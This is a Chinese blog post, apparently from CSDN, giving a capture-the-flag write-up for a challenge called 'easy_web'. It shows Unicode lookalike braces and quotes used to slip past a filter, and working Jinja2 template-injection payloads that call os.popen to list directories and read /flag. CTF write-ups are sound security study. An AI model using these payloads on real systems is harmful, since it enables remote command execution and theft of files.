攻防世界——easy_web详解

最新推荐文章于 2025-03-17 00:20:32 发布
最新推荐文章于 2025-03-17 00:20:32 发布
阅读量1.1k 收藏 4
点赞数 19
CC 4.0 BY-SA版权
文章标签: 安全 web安全 网络协议 python windows linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chinese_cabbage0/article/details/139481837

1.打开靶场,发现一个输入框,尝试注入

使用1'#来注入,回显字符被过滤了,尝试其他的方法,没有找到其他的,那么抓包看看

通过抓包后的回显发现是python,这就想到了flask、ssti模板注入,先测试ssti

发现{{1}}中的{}被限制了,

于是我从字符大全中搜索到了如图的字符,这个题目是字符规范器,使用特殊的大括号

结果回显这个

调换了以下位置,发现是我弄错了

而且他存在格式化的

测试以下有没有存在ssti注入的漏洞,可以看出是存在ssti注入的漏洞的

这个注入是过滤掉了英文的{}和英文的'、"所以使用的ssti注入语句要替换,那么就吧{}替换为︷︸,然后'和"替换为特殊符号'和"

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")︸︸

可以看出回显了当前目录的文件,我们使用ls /查看根目录的文件

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls /').read()")︸︸

发现了flag文件,那么使用cat /flag来查看flag就可以了

︷︷a.__init__.__globals__.__builtins__.eval("__import__('os').popen('cat /flag').read()")︸︸

感谢支持!!!!!

xing.yu.CTF
关注
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
热门推荐
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[学习笔记]攻防世界easy_web
最新发布
qq_58742026的博客
03-17 681
SSTI模版注入,RCS
攻防世界 WEB easy_laravel
qq_41696858的博客
02-06 3761
这题我一开始是在攻防世界做的,但是不知道今天靶场又抽什么风了。。。。反正两个靶场配置有点不一样,但是出入不是很大,BUUCTF需要提前手动利用管理员邮箱reset_password一下,攻防世界不需要 打开场景,审计页面源码,发现源码地址直接给出来了,非常的简单粗暴啊 https://github.com/qazxcv123/easy_laravel 建议把源码下下来,自己搭个环境慢慢看,不然不方便。那就看源码呗,先看路由,mvc的入口点 哦对了先说一下,larvel是一个PHP的web框架 在一个个尝试路
攻防世界--easy_web
qq_44418229的博客
07-25 2326
SSTI---利用特殊字符进行绕过;对SSTI的补充
攻防世界easy_web
qq_63928796的博客
07-22 1207
function需要自己寻找正在上传…重新上传取消︷︷().
【愚公系列】2023年06月 攻防世界-Webeasy_web
时光隧道
06-16 4665
SSTI模板注入是一种特殊的代码注入攻击,在使用模板引擎的Web应用程序中广泛存在。攻击者通过输入恶意数据,触发模板引擎解析执行攻击代码,从而控制应用程序并获取敏感信息。以下是一个基于Jinja2模板引擎的SSTI模板注入攻击案例:1、首先,攻击者访问目标网站并找到一个可以利用的输入点,如搜索框或评论框等。该代码将显示应用程序的配置项。通过SSTI模板注入攻击,攻击者可以轻松地获取应用程序的敏感信息并最终控制服务器。因此,开发人员应该采取必要的安全措施,防止SSTI模板注入攻击。
深入理解SSTI. 攻防世界easy_webpython脚本
shshsj11的博客
04-19 426
这些对象可以被读取和修改,接下来介绍 __builtins__ 是 Python 中一个内置的模块对象,他在python解释器启动时, __builtins__ 对象就会被创建并且自动添加到全局命名空间中,因此 __builtins__ 可以在认可地方访问, __builtins__ 模块包含了很多内置函数,其中就包括我们这提要用的open(),所以我们通过__globals__来访问 __builtins__ 模块中的open函数来达到读取flag文件的目的,记录下第一次自己写脚本。
攻防世界 - Web - Level 1 file_include
m0_74824687的博客
12-26 781
本题考察的是 PHP 的文件包含漏洞,一般 CTF 的文件包含漏洞考点都是 PHP 伪协议。文件中的,当然不乏改名的。我们在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫,但笔者觉得没必要)。首先请求上面的 Payload 模板,并使用 BurpSuite 进行抓包,然后将 PHP 支持的字符编码作为参数替换。估计是对用户传入值进行一个检查的文件,然后就是直接进行文件包含了。的话,内容肯定会和我们直接访问一样,显示为空,所以我们需要对。下面我们就是尝试进行文件包含,直接包含。
20200109攻防世界WEB高手区题目一题多解全教程通关(13-18)
qq_45290991的博客
01-09 559
013unserialize3 经典的反序列化绕过wake_up魔术方法姿势,表示属性个数的值大于真实属性个数时,会绕过 _wakeup 函数的执行。我还是推荐官网的教程,实在太经典了,大爱❥(^_-)https://www.php.cn/php-weizijiaocheng-454909.html 一进去这道题,源码直接: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?c
EasyWebV1.9
11-19
简单的本地web服务器搭建工具。可用于简单的接口模拟或者网页搭建
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
yuanxu8877的博客
11-29 2905
新版攻防世界easy_web-web进阶ssti绕过(太湖杯)
攻防世界-web- easyphp
32bin的博客
10-30 1404
最近在学习CTF web相关知识,顺带学习php,在攻防世界平台上做做题。遇到了一道名为easyphp的题目,对我这个新手一点也不easy,于是决定把过程记录下来。版权声明:本文为优快云博主「weixin_46906325」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。原文链接:https://blog.youkuaiyun.com/weixin_46906325/article/details/127154789。#攻防世界-web- easyphp。依次构造a、b、c的值!
easy-web
小雨的光的博客
01-23 9176
Easy-web 介绍 一款基于界面配置的代码生成工具。与其他开源项目的不同点是,只生成了后端代码,无论是前后端分离项目还是不分离项目,都可以轻松的接入。同时,封装了大量的基础性代码,极大地简化了开发过程。 使用说明 Maven引用(点击https://search.maven.org/search?q=g:io.github.xiaoyudeguang查看最新版本) <d...
Easy Web
shinygod的博客
02-09 495
知识点:flag格式看清楚 进入网站就是一个这,光溜溜的 先抓个包看看 cookie中有个value,base64解码一下就出来了 cybergrabs{its_easy_web} 就是这样。 我tm以为它告诉我flag在easy web里,我想这不是废话吗,没想到这个its_easy_web就是答案,误人子弟啊 ...
攻防世界-web-easytornado
wuh2333的博客
07-19 1661
攻防世界,模板注入
攻防世界easy_web之SSTI注入
m0_66935689的博客
07-29 445
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
攻防世界 easyvm
weixin_43798872的博客
12-06 716
攻防世界 进阶 easyvm
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值